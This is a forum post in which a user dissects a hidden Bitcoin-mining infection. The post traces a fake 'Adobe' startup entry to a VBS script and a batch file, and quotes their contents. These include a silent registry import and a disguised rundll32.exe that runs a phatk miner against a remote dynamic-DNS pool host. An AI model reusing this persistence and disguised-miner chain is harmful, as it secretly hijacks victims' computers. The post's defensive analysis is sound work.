Firstly, I would like to ask, did you find anything and if so, what?
Then unfortunately I seem to be experiencing the exact same problem as you and I did do a little manual digging which resulted in the following knowledge:
The program has added itself to the start up of the system, under msconfig, startup, look for
Startup item: Adobe; Manufacturer: Unknown; Command: c:\programdata\adob\color.vbs (un-marking it may yield results with it not starting at least but I am not sure if there are other safeguards in place)
Now OBVIOUSLY this has nothing to do with adobe, especially since I don't have any product of theirs, not even the flash player and besides the real adobe folder would be c:\programdata\Adobe, checked on a friends PC.
That color.vbs is a visual basic script file and peering inside reveals it does the following:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\ProgramData\adob\start.bat", 0, false
Which translates to running start.bat in that folder if I'm not mistaken, then the code in the bat file is:
regedit.exe /s 123.reg
ping 127.0.0.1 -n 60
rundll32.exe -k phatk -o http://ferm.chickenkiller.com:80
-u ferm1 -p 12345 -I 1
so it opens up windows' registry editor adds(after looking in the mentioned registry file)
It then proceeds to ping your localhost 60 times, why? Who knows.
("127.0.0.1 is the loopback Internet protocol (IP) address also referred to as the “localhost.” The loopback construct gives a computer or device capable of networking the capability to validate or establish the IP stack on the machine.")
then it changes the directory it is working in to C:/ProgramData/adob and proceeds to run a custom rundll32.exe(from that directory), note, this is NOT the rundll windows uses, windows uses the 1 in the system 32 folder although that one can also become infected of course. IF and how this exe file was customized remains a hexadecimal mystery, that is because I can only view the code in hexadecimal and from that I can't really tell you anything at all.
If I remember correctly the base use of rundll32 is to well, run dll files, which of course each contain programming code of their own. The 3 dll files this specific folder is
also present are 2 bin files,
phatk110722GeForce GTX 580v1w256long4.bin
now phatk110722GeForce GTX 580v1w256long4.bin will most definitely differ from different pc's because it names the gpu currently in the machine(at least for me it does)
Sigh, now Poclbm (PyOpenCL bitcoin miner) is a python GPU bitcoin miner that uses the OpenCL framework to quickly perform the hashing computations. Works with AMD - 4xxx and up, Nvidia - 8xxx and up, video cards.
But this is not what we are dealing with, this guy is simply using code from the open source project to do hashing computations? on our gpu's? If I were to take an extremely wild guess here that is. Some PC's might not really be all that affected then as some GPU's aren't supported. But I digress. I am a bit tired will probably look into it further tomorrow.
Also treminating the rundll32.exe process that is eating up our CPU's and perhaps GPU's seems to stop the problem until you restart(but removing it from startup in msconfig should fix that, regardless this might just be the tip of the iceberg and as such I need to know more about what this thing is actually doing, for the sake of my sanity).
Edited by qwynbleid, 03 January 2013 - 05:54 PM.